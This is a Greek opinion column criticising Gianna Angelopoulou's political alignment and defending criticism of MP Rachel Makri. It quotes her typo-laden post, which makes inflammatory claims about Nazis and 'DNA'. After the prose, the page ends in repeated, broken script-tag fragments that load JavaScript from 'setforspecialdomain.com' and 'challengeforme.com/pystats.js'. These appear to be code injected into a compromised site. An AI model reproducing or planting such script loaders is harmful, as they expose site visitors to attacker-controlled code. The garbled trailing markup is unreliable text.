Η Γιάννα “Αντισυστημική”;;; Του Θαλή Κουτούπη

0046

Γράφει ο Θαλής Κουτούπης

Συχνά έχω επαινέσει δημόσια τη Γιάννα Αγγελοπούλου και για τη δυναμική προσωπικότητά της και για την τεράστια προσφορά της στους “Ολυμπιακούς Αγώνες” και την έχω υπερασπισθεί, απέναντι σε κακόβουλες και μικρόψυχες τις περισσότερες φορές επιθέσεις εναντίον της.

Τώρα όμως, παρακινημένη ίσως από δικαιολογημένη πίκρα για την πλήρη “περιφρόνησή” της απ’ το σύστημα, αμέσως μόλις έσβησαν τα φώτα των Ολυμπιακών Αγώνων, θεώρησε σκόπιμο να το εκδικηθεί, συμπαρατασσόμενη με τον “αντισυστημικό” Αλέξη, ούσα η ίδια τμήμα της καρδιάς του συστήματος!

Άστοχη, επικίνδυνη κι ανάξια της ιστορίας της τοποθέτηση, που δίνει πλέον δικαιολογημένα ισχυρά όπλα στους “αντιπάλους” και τους “εχθρούς” της.

Κρίμα, γιατί “τα στερνά τιμούν τα πρώτα”!…

ΑΛΛΟΙ ΕΙΝΑΙ ΟΙ ΕΝΟΧΟΙ, ΟΧΙ Η κ. ΡΑΧΗΛ ΜΑΚΡΗ!​

«Σκαρωσαν τη λιστα στην οποια μπηκαν / Λεφτά από τιε φαρμακευτικες / Χα χα / Καλό / Χιαρομαι οτνα βλεπω υπεραπσιστες του / Τηλεβιβλιοπωλη και του καιεστωτος ετσι ιεναι καο την κατοχη / Ειχαν μαζι με τους ναζι / Εμπαιναν μοορστλα κι σκοτωναν παιδαι και ξεκοιλιαζαν γυναικεσ το / Σπερμα δεν αλαλζει σε μερικους / πο όσον βελπω / παρκενει βαθια στο dna / ο γνωστος τυπος ξαναγυρισε να παρει λογη δοξΑ»

Όποιος τολμήσει να πει ότι αυτό το κείμενο που ανάρτησε η κ. Ραχήλ Μακρή είναι απαράδεκτο για μέλος του Ελληνικού Κοινοβουλίου, να ψάξει να βρει αυτούς που την ψήφισαν και τον ψεκασμένο Αρχηγό της, που την έβαλε στο κόμμα του!___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>challengeforme.com/pystats.js’ async=true >challengeforme.com/pystats.js’ async=true >‘ >‘ >‘ >‘ >‘ >‘ >‘ >‘ >